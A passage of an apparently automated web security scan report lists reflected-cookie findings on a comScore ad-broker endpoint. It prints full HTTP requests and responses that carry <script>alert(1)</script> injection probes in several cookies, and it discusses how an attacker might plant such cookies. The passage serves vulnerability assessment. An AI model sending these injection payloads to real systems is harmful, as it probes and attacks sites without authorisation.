BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&afe4a<script>alert(1)</script>2a7bdbc50e5', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the response without encoding. The payload 62218<script>alert(1)</script>c76aa499034 was submitted in the ar_p90175839 cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds (the "ar_p90175839" entry below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary ar_p90175839 value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&62218<script>alert(1)</script>c76aa499034; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&62218<script>alert(1)</script>c76aa499034', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851"
...[SNIP]...

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the response body, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object. (The scanner template's description of plain text between HTML tags does not match this response.) The payload e561b<script>alert(1)</script>97681a38a8f was submitted in the ar_p90452457 cookie and was echoed unmodified.

This proof of concept shows that the cookie value reaches a script context with no output encoding. As sent, however, the payload does not execute: a <script> tag is just text inside a JavaScript string in a script resource, and the single quote enclosing the value is never closed. Script execution would require an unescaped single quote (or backslash) in the cookie value, and the report does not show whether those characters survive unmodified.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The server scopes its own cookies to .voicefive.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&e561b<script>alert(1)</script>97681a38a8f; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
739&arc=40422016&', "BMX_G": 'method->-1,ts->1304954985', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&e561b<script>alert(1)</script>97681a38a8f', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the response body, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object. (The scanner template's description of plain text between HTML tags does not match this response.) The payload 1f282<script>alert(1)</script>608567be610 was submitted in the ar_p91136705 cookie and was echoed unmodified.

This proof of concept shows that the cookie value reaches a script context with no output encoding. As sent, however, the payload does not execute: a <script> tag is just text inside a JavaScript string in a script resource, and the single quote enclosing the value is never closed. Script execution would require an unescaped single quote (or backslash) in the cookie value, and the report does not show whether those characters survive unmodified.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The server scopes its own cookies to .voicefive.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&1f282<script>alert(1)</script>608567be610; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&1f282<script>alert(1)</script>608567be610', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&rec
...[SNIP]...

2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the response body, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object. (The scanner template's description of plain text between HTML tags does not match this response.) The payload 3242f<script>alert(1)</script>964b49411c1 was submitted in the ar_p91300630 cookie and was echoed unmodified.

This proof of concept shows that the cookie value reaches a script context with no output encoding. As sent, however, the payload does not execute: a <script> tag is just text inside a JavaScript string in a script resource, and the single quote enclosing the value is never closed. Script execution would require an unescaped single quote (or backslash) in the cookie value, and the report does not show whether those characters survive unmodified.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The server scopes its own cookies to .voicefive.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&3242f<script>alert(1)</script>964b49411c1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&3242f<script>alert(1)</script>964b49411c1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the response body, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object. (The scanner template's description of plain text between HTML tags does not match this response.) The payload 6cd03<script>alert(1)</script>1bad017a894 was submitted in the ar_p92429851 cookie and was echoed unmodified.

This proof of concept shows that the cookie value reaches a script context with no output encoding. As sent, however, the payload does not execute: a <script> tag is just text inside a JavaScript string in a script resource, and the single quote enclosing the value is never closed. Script execution would require an unescaped single quote (or backslash) in the cookie value, and the report does not show whether those characters survive unmodified.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The server scopes its own cookies to .voicefive.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&6cd03<script>alert(1)</script>1bad017a894; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
1&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&6cd03<script>alert(1)</script>1bad017a894', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the response body, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object. (The scanner template's description of plain text between HTML tags does not match this response.) The payload 601d2<script>alert(1)</script>02d3d14ba53 was submitted in the ar_p97174789 cookie and was echoed unmodified.

This proof of concept shows that the cookie value reaches a script context with no output encoding. As sent, however, the payload does not execute: a <script> tag is just text inside a JavaScript string in a script resource, and the single quote enclosing the value is never closed. Script execution would require an unescaped single quote (or backslash) in the cookie value, and the report does not show whether those characters survive unmodified.

Note also that this response writes the injected value back to the client: the Set-Cookie header for ar_p97174789 re-emits the payload as a new key (601d2<script>alert(1)</script>02d3d14ba53=) with an expiry of 07-Aug-2011. Whatever is injected into this cookie is therefore persisted by the server for the life of the cookie rather than reflected once.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The server scopes its own cookies to .voicefive.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&601d2<script>alert(1)</script>02d3d14ba53; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&601d2<script>alert(1)</script>02d3d14ba53=&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&601d2<script>alert(1)</script>02d3d14ba53', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->
...[SNIP]...

2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the response body, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object. (The scanner template's description of plain text between HTML tags does not match this response.) The payload 4341e<script>alert(1)</script>faac9635f42 was appended to the existing value 1 of the ar_s_p81479006 cookie and was echoed unmodified as 14341e<script>alert(1)</script>faac9635f42.

This proof of concept shows that the cookie value reaches a script context with no output encoding. As sent, however, the payload does not execute: a <script> tag is just text inside a JavaScript string in a script resource, and the single quote enclosing the value is never closed. Script execution would require an unescaped single quote (or backslash) in the cookie value, and the report does not show whether those characters survive unmodified.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The server scopes its own cookies to .voicefive.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
